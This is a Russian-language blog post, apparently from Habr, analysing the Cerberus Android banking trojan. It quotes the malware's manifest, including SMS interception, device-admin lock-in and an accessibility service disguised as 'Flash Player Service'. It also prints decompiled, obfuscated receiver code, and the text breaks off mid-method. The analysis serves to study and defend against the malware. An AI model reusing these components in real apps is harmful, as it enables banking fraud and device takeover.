{"id":292027,"date":"2019-07-13T15:01:48","date_gmt":"2019-07-13T15:01:48","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=292027"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=292027","title":{"rendered":"\u0418\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e Malware Cerberus \u043f\u043e\u0434 Android"},"content":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/5fb\/391\/192\/5fb39119247d45dfa979392da83f34f1.png\" alt=\"image\"><\/p>\n<p>  \u041d\u0430 \u043d\u043e\u0441\u0443 \u0443\u0436\u0435 2020 \u0433\u043e\u0434 \u0438 \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u0443\u0436\u0435 \u0432\u0435\u0440\u0441\u0438\u044e Android 9.0 Pie, \u0433\u0434\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Google \u0431\u044c\u0435\u0442 \u0441\u0435\u0431\u0435 \u0432 \u0433\u0440\u0443\u0434\u044c \u0438 \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u0447\u0442\u043e \u0438\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442 \u0437\u0430\u0449\u0438\u0449\u0435\u043d. \u041d\u043e \u0437\u043b\u043e\u0434\u0435\u0438 \u043d\u0435 \u0434\u0440\u0435\u043c\u043b\u044e\u0442 \u0438 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u0441\u0432\u043e\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u044b \u0434\u043b\u044f Android. <\/p>\n<p>  \u0421\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043d\u0435 \u043f\u043e\u043f\u0430\u043b\u0441\u044f \u043d\u0430 \u0440\u0443\u043a\u0438 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 apk \u0444\u0430\u0439\u043b, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u043e\u0439 \u043c\u0430\u043b\u0432\u0430\u0440\u044c\u044e \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u00abCerberus\u00bb, \u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043e\u043d \u0432 2019 \u0433\u043e\u0434\u0443.<\/p>\n<p>  APK \u0444\u0430\u0439\u043b \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u0430 \u043f\u043e\u043f\u0430\u043b \u043a\u043e \u043c\u043d\u0435 \u0441 \u043d\u0435\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c, \u043f\u043e \u044d\u0442\u043e\u043c\u0443 \u0447\u0430\u0441\u0442\u044c \u043b\u043e\u0433\u0438\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0438\u0437\u0443\u0447\u0435\u043d\u043d\u043e\u0439, \u0442\u0430\u043a \u043a\u0430\u043a \u0434\u0430\u043d\u043d\u044b\u0439 \u0431\u043e\u0442\u043d\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u00ab\u043c\u043e\u0434\u0443\u043b\u044c\u043d\u0443\u044e\u00bb \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0438 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0441\u043e \u0441\u0432\u043e\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430.<br \/>  <a name=\"habracut\"><\/a>  <\/p>\n<h2>\u0410\u043d\u0430\u043b\u0438\u0437 apk \u043f\u0430\u043a\u0435\u0442\u0430<\/h2>\n<p>  \u041f\u043e\u0441\u043b\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 apk-\u043f\u0430\u043a\u0435\u0442\u0430, \u044f \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b: <\/p>\n<ol>\n<li>Receiver, autorun + alarm;<\/li>\n<li>Service, \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0432 \u0446\u0438\u043a\u043b\u0435 \u0441 \u0438\u043d\u0442\u0435\u0440\u0432\u0430\u043b\u043e\u043c 8 \u0441\u0435\u043a\u0443\u043d\u0434, \u043e\u043d \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u043f\u043e\u043a\u0430\u0437 \u0432\u0441\u043f\u043b\u044b\u0432\u0430\u044e\u0449\u0435\u0433\u043e \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f Accessibility Service, \u0430\u043a\u0442\u0438\u0432\u0430\u0446\u0438\u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u044d\u043a\u0440\u0430\u043d\u0430 \u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430;<\/li>\n<li>Service, \u0441\u043e\u0431\u0438\u0440\u0430\u044e\u0449\u0438\u0439 \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0434\u0430\u0442\u0447\u0438\u043a\u043e\u0432 \u0434\u0435\u0432\u0430\u0439\u0441\u0430, \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0434\u0435\u0432\u0430\u0439\u0441\u0430;<\/li>\n<li>Service, \u0432 \u0446\u0438\u043a\u043b\u0435 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u044d\u043a\u0440\u0430\u043d \u0434\u0435\u0432\u0430\u0439\u0441\u0430;<\/li>\n<li>Service, \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u043e\u0431\u043c\u0435\u043d \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c;<\/li>\n<li>Activity, \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u0435\u0442 html \u043a\u043e\u0434 \u0432 WebView, \u0438 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435, \u0441\u043b\u0443\u0436\u0438\u0442 \u0434\u043b\u044f \u043f\u043e\u0434\u043c\u0435\u043d\u044b \u0430\u043a\u0442\u0438\u0432\u0438\u0442\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0431\u0430\u043d\u043a\u0430;<\/li>\n<li>Activity, \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f.<\/li>\n<li>Class, \u0445\u0440\u0430\u043d\u0438\u0442 \u0432 \u0441\u0435\u0431\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438(String) \u043f\u0440\u043e\u0435\u043a\u0442\u0430<\/li>\n<\/ol>\n<p>  <\/p>\n<h2>\u041d\u0430\u0447\u043d\u0451\u043c \u0441 \u043c\u0430\u043d\u0438\u0444\u0435\u0441\u0442\u0430<\/h2>\n<p>  \u041c\u0430\u043d\u0438\u0444\u0435\u0441\u0442 \u0443 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439, \u0438 \u0443\u0436\u0435 \u043f\u043e \u043d\u0435\u043c\u0443 \u043c\u043e\u0436\u043d\u043e \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0430 \u043e\u0431\u044b\u043a\u043d\u043e\u0432\u0435\u043d\u043d\u0430\u044f \u043c\u0430\u043b\u0432\u0430\u0440\u044c.<\/p>\n<p>  \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f:<\/p>\n<pre><code class=\"xml\">&lt;uses-permission android:name=\"android.permission.RECEIVE_BOOT_COMPLETED\"\/&gt; &lt;uses-permission android:name=\"android.permission.READ_PHONE_STATE\"\/&gt; &lt;uses-permission android:name=\"android.permission.CALL_PHONE\"\/&gt; &lt;uses-permission android:name=\"android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS\"\/&gt; &lt;uses-permission android:name=\"android.permission.READ_CONTACTS\"\/&gt; &lt;uses-permission android:name=\"android.permission.READ_SMS\"\/&gt; &lt;uses-permission android:name=\"android.permission.INTERNET\"\/&gt; &lt;uses-permission android:name=\"android.permission.WAKE_LOCK\"\/&gt; &lt;uses-permission android:name=\"android.permission.SEND_SMS\"\/&gt; &lt;uses-permission android:name=\"android.permission.RECEIVE_SMS\"\/&gt; <\/code><\/pre>\n<p>  \u0422\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0421\u041c\u0421, \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u0430\u043c, \u0437\u0432\u043e\u043d\u043a\u0430\u043c, \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0443, \u0440\u0430\u0431\u043e\u0442\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0432 \u0441\u043f\u044f\u0449\u0435\u043c \u0440\u0435\u0436\u0438\u043c\u0435.<\/p>\n<p>  \u0418\u0434\u0451\u043c \u0434\u0430\u043b\u044c\u0448\u0435, \u0438 \u0432\u0438\u0434\u0438\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044e \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f\\\u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043c\u0441, \u044d\u0442\u043e \u0437\u043b\u043e\u0434\u0435\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u043b\u044f \u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0421\u041c\u0421 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u043d\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0445 \u0436\u0435\u0440\u0442\u0432.<\/p>\n<pre><code class=\"xml\"> \t&lt;activity android:name=\"com.wfozbladhvnk.ibvtgx.iExuCRAHNmEv\"&gt;             &lt;intent-filter&gt;                 &lt;data android:scheme=\"sms\"\/&gt;                 &lt;action android:name=\"android.intent.action.SENDTO\"\/&gt;                 &lt;data android:scheme=\"smsto\"\/&gt;                 &lt;action android:name=\"android.intent.action.SEND\"\/&gt;             &lt;\/intent-filter&gt;         &lt;\/activity&gt;          &lt;receiver android:name=\"com.wfozbladhvnk.ibvtgx.lThcZejcCFe\" android:permission=\"android.permission.BROADCAST_WAP_PUSH\"&gt;             &lt;intent-filter&gt;                 &lt;data android:mimeType=\"application\/vnd.wap.mms-message\"\/&gt;                 &lt;action android:name=\"android.provider.Telephony.WAP_PUSH_DELIVER\"\/&gt;             &lt;\/intent-filter&gt;         &lt;\/receiver&gt;          &lt;service android:name=\"com.wfozbladhvnk.ibvtgx.UwLgqh\" android:permission=\"android.permission.SEND_RESPOND_VIA_MESSAGE\"&gt;             &lt;intent-filter&gt;                 &lt;data android:scheme=\"sms\"\/&gt;                 &lt;action android:name=\"android.intent.action.RESPOND_VIA_MESSAGE\"\/&gt;                 &lt;data android:scheme=\"smsto\"\/&gt;             &lt;\/intent-filter&gt;         &lt;\/service&gt;<\/code><\/pre>\n<p>  \u041d\u0443 \u0438 \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0420\u0435\u0441\u0438\u0432\u0435\u0440, \u043e\u043d \u0441\u043b\u0443\u0436\u0438\u0442 \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u0438 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u0421\u041c\u0421.<\/p>\n<pre><code class=\"xml\">\t&lt;receiver android:name=\"com.wfozbladhvnk.ibvtgx.wtawxrmdzej.oClFeoEgobr\" android:permission=\"android.permission.BROADCAST_SMS\"&gt;         &lt;intent-filter android:priority=\"979\"&gt;             &lt;action android:name=\"android.intent.action.QUICKBOOT_POWERON\"\/&gt;             &lt;action android:name=\"com.htc.intent.action.QUICKBOOT_POWERON\"\/&gt;             &lt;action android:name=\"android.intent.action.PACKAGE_ADDED\"\/&gt;             &lt;action android:name=\"android.intent.action.USER_PRESENT\"\/&gt;             &lt;action android:name=\"android.intent.action.PACKAGE_REMOVED\"\/&gt;             &lt;action android:name=\"android.provider.Telephony.SMS_RECEIVED\"\/&gt;             &lt;action android:name=\"android.provider.Telephony.SMS_DELIVER\"\/&gt;             &lt;action android:name=\"android.intent.action.BOOT_COMPLETED\"\/&gt;         &lt;\/intent-filter&gt;     &lt;\/receiver&gt;<\/code><\/pre>\n<p>  \u041f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430, \u044d\u0442\u043e \u0443\u0436\u0435 \u043d\u0430\u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0435\u0435. \u041f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044e \u043e\u043d\u0438 \u043d\u0443\u0436\u043d\u044b \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f (\u043f\u0440\u0438 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u043f\u0440\u0430\u0432\u0430\u0445 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430, \u043a\u043d\u043e\u043f\u043a\u0438 \u00ab\u0443\u0434\u0430\u043b\u0438\u0442\u044c\u00bb \u0443 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u0431\u0443\u0434\u0435\u0442), \u0442\u0430\u043a \u0436\u0435 \u044d\u0442\u0438 \u043f\u0440\u0430\u0432\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0442 \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0432\u0441\u0451 \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u0435\u0432\u0430\u0439\u0441.<\/p>\n<pre><code class=\"xml\"> \t&lt;activity android:theme=\"@style\/Theme.NoDisplay\" android:label=\"\" android:name=\"com.wfozbladhvnk.ibvtgx.hwefoncq.ZQoykALT\" android:excludeFromRecents=\"true\"\/&gt;  \t&lt;receiver android:label=\"System Driver\" android:name=\"com.wfozbladhvnk.ibvtgx.hwefoncq.LuMBTH\" android:permission=\"android.permission.BIND_DEVICE_ADMIN\"&gt;         &lt;meta-data android:name=\"android.app.device_admin\" android:resource=\"@xml\/ypqvk\"\/&gt;         &lt;intent-filter android:priority=\"121\"&gt;             &lt;action android:name=\"android.app.action.DEVICE_ADMIN_ENABLED\"\/&gt;             &lt;action android:name=\"android.app.action.DEVICE_ADMIN_DISABLED\"\/&gt;             &lt;action android:name=\"android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED\"\/&gt;         &lt;\/intent-filter&gt;     &lt;\/receiver&gt;<\/code><\/pre>\n<p>  \u041d\u0443 \u0438 \u0441\u0430\u043c\u043e\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435, \u044d\u0442\u043e Accessibility Service. \u041e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043c\u043e\u0433\u043b\u0430 \u0441\u0430\u043c\u0430 \u043a\u043b\u0438\u043a\u0430\u0442\u044c \u043f\u043e \u044d\u043a\u0440\u0430\u043d\u0443, \u0438 \u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u0435 \u043d\u0443\u0436\u043d\u044b\u0435 \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u0438 \u0430\u0434\u043c\u0438\u043d \u043f\u0440\u0430\u0432\u0430. \u0427\u0435\u0440\u0435\u0437 \u044d\u0442\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442 \u0432\u0441\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435.<\/p>\n<pre><code class=\"xml\"> \t&lt;service android:label=\"Flash Player Service\" android:name=\"com.wfozbladhvnk.ibvtgx.iyqvybm.BEUZLDTj\" android:permission=\"android.permission.BIND_ACCESSIBILITY_SERVICE\"&gt;         &lt;intent-filter&gt;             &lt;action android:name=\"android.accessibilityservice.AccessibilityService\"\/&gt;         &lt;\/intent-filter&gt;         &lt;meta-data android:name=\"android.accessibilityservice\" android:resource=\"@xml\/ikxclmrgfqap\"\/&gt;     &lt;\/service&gt;<\/code><\/pre>\n<p>  \u041d\u0443 \u0438 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043e\u0441\u043e\u0431\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0430 \u0431\u0435\u0437 \u0432\u0430\u043b\u0438\u0434\u043d\u043e\u0433\u043e \u0430\u0434\u0440\u0435\u0441\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043c\u0430\u043b\u0432\u0430\u0440\u0438.<\/p>\n<pre><code class=\"xml\">\t&lt;activity android:label=\"mhudtqw\" android:name=\"com.wfozbladhvnk.ibvtgx.wsdckwoau\"\/&gt; \t&lt;service android:name=\"com.wfozbladhvnk.ibvtgx.coimtetkf\"\/&gt; \t&lt;service android:name=\"com.wfozbladhvnk.ibvtgx.iyqvybm.dYDbaxro\"\/&gt;     &lt;service android:name=\"com.wfozbladhvnk.ibvtgx.iyqvybm.HvGIrpl\"\/&gt;     &lt;service android:name=\"com.wfozbladhvnk.ibvtgx.iyqvybm.HnzCyZAKNVN\"\/&gt;<\/code><\/pre>\n<p>  \u0412 \u043e\u0431\u0449\u0435\u043c \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u0438\u0447\u0435\u0433\u043e \u0441\u0432\u0435\u0440\u0445\u044a\u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e, \u0432 \u043d\u0435\u0439 \u043d\u0435\u0442\u0443 \u043d\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043a\u0430\u043a\u0438\u0445 \u043b\u0438\u0431\u043e 0-day \u043d\u0430 \u0430\u043d\u0434\u0440\u043e\u0438\u0434. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u0436\u0435\u0440\u0442\u0432\u044b \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f, \u0438 \u043d\u0435 \u0431\u043e\u043b\u0435\u0435, \u0434\u0430\u043b\u044c\u0448\u0435 \u043c\u0430\u043b\u0432\u0430\u0440\u044c \u0432\u0441\u0451 \u0441\u0434\u0435\u043b\u0430\u0435\u0442 \u0441\u0430\u043c\u0430.<\/p>\n<p>  Google \u043d\u0430\u0434\u043e \u0431\u044b \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0442\u044c \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 API \u0434\u043b\u044f \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043d\u0435 \u0438\u0437 \u043f\u043b\u0435\u0439 \u043c\u0430\u0440\u043a\u0435\u0442\u0430.<\/p>\n<h2>Receiver<\/h2>\n<p>  \u041a\u043e\u0434 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u043b\u0430\u0441\u0441\u0430 \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d, \u043d\u043e \u044d\u0442\u043e \u043d\u0435 \u043c\u0435\u0448\u0430\u0435\u0442 \u0435\u0433\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c.<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043a\u043e\u0434<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"java\">public void onReceive(Context context, Intent intent) {  \tint i;     C0005b bVar;     String str;     String sb;     if (!this.f345b.mo39d(context, this.f344a.f243g).contains(this.f344a.f45aS) &amp;&amp; !this.f345b.mo32b(context)) { \t\tthis.f345b.mo24a(this.f347d, this.f344a.f46aT); \t\tC0005b bVar2 = this.f345b; \t\tthis.f344a.getClass(); \t\tC0005b.m16a(context, \"\", 10000); \t\tint i2 = 0; \t\twhile (true) { \t\t\tif (i2 &lt; this.f344a.f241ec.length) { \t\t\t\tif (VERSION.SDK_INT &gt;= 26 &amp;&amp; !this.f346c.mo14b(context)) { \t\t\t\t\tbreak; \t\t\t\t} \t\t\t\tif (this.f345b.mo25a(context, this.f344a.f241ec[i2])) { \t\t\t\t\tif (ppknbeydxzuwxxv.class.getName().equals(this.f344a.f241ec[i2].getName())) { \t\t\t\t\t\tcontext.stopService(new Intent(context, this.f344a.f241ec[i2])); \t\t\t\t\t} \t\t\t\t\tbVar = this.f345b; \t\t\t\t\tstr = this.f347d; \t\t\t\t\tStringBuilder sb2 = new StringBuilder(); \t\t\t\t\tsb2.append(this.f344a.f90bK); \t\t\t\t\tsb2.append(this.f344a.f241ec[i2]); \t\t\t\t\tsb = sb2.toString(); \t\t\t\t} else if (lsbcgaldiywkd.class.getName().equals(this.f344a.f241ec[i2].getName())) { \t\t\t\t\tcontext.startService(new Intent(context, this.f344a.f241ec[i2])); \t\t\t\t\tbVar = this.f345b; \t\t\t\t\tstr = this.f347d; \t\t\t\t\tStringBuilder sb3 = new StringBuilder(); \t\t\t\t\tsb3.append(this.f344a.f88bI); \t\t\t\t\tsb3.append(this.f344a.f241ec[i2]); \t\t\t\t\tsb = sb3.toString(); \t\t\t\t} else { \t\t\t\tint parseInt = Integer.parseInt(this.f345b.mo39d(context, this.f344a.f47aU)); \t\t\t\tthis.f344a.getClass(); \t\t\t\tif (parseInt &gt;= 0) { \t\t\t\t\tcontext.startService(new Intent(context, this.f344a.f241ec[i2])); \t\t\t\t\tbVar = this.f345b; \t\t\t\t\tstr = this.f347d; \t\t\t\t\tStringBuilder sb4 = new StringBuilder(); \t\t\t\t\tsb4.append(this.f344a.f89bJ); \t\t\t\t\tsb4.append(this.f344a.f241ec[i2]); \t\t\t\t\tsb = sb4.toString(); \t\t\t\t} else { \t\t\t\t\ti2++; \t\t\t\t} \t\t\t} \t\t\tbVar.mo24a(str, sb); \t\t\ti2++; \t\t\t} else { \t\t\t\tbreak; \t\t\t} \t\t} \t\tthis.f345b.mo23a(this.f347d, context); \t\tthis.f345b.mo22a(context, this.f344a.f259w, this.f345b.mo33b(context, pzjzcxauihlf.class) ? this.f344a.f42aP : this.f344a.f39aM); \t\tif (intent.getAction().equals(this.f344a.f29aC)) { \t\t\tthis.f345b.mo20a(context, intent); \t\t} \t\ttry { \t\t\ti = Integer.parseInt(this.f345b.mo39d(context, this.f344a.f58af)); \t\t\tint parseInt2 = Integer.parseInt(this.f345b.mo39d(context, this.f344a.f57ae)) + 1; \t\t\ti++; \t\t\tC0005b bVar3 = this.f345b; \t\t\tString str2 = this.f344a.f57ae; \t\t\tStringBuilder sb5 = new StringBuilder(); \t\t\tthis.f344a.getClass(); \t\t\tsb5.append(\"\"); \t\t\tsb5.append(parseInt2); \t\t\tbVar3.mo22a(context, str2, sb5.toString()); \t\t\tC0005b bVar4 = this.f345b; \t\t\tString str3 = this.f344a.f58af; \t\t\tStringBuilder sb6 = new StringBuilder(); \t\t\tthis.f344a.getClass(); \t\t\tsb6.append(\"\"); \t\t\tsb6.append(i); \t\t\tbVar4.mo22a(context, str3, sb6.toString()); \t\t} catch (Exception e2) { \t\t\te = e2; \t\t\ti = 0; \t\t\tC0005b bVar5 = this.f345b; \t\t\tString str4 = this.f344a.f252p; \t\t\tStringBuilder sb7 = new StringBuilder(); \t\t\tsb7.append(\"(pro8)  | vvcy \"); \t\t\tsb7.append(e.toString()); \t\t\tsb7.append(\"::endLog::\"); \t\t\tbVar5.mo31b(context, str4, sb7.toString()); \t\t\tif (i &gt;= 3) { \t\t\t\treturn; \t\t\t} \t\t\treturn; \t\t} \t\tif (i &gt;= 3 &amp;&amp; !this.f345b.mo46i(context) &amp;&amp; this.f345b.mo48k(context) &amp;&amp; this.f345b.mo33b(context, pzjzcxauihlf.class)) { \t\t\tif (this.f345b.mo33b(context, pzjzcxauihlf.class)) { 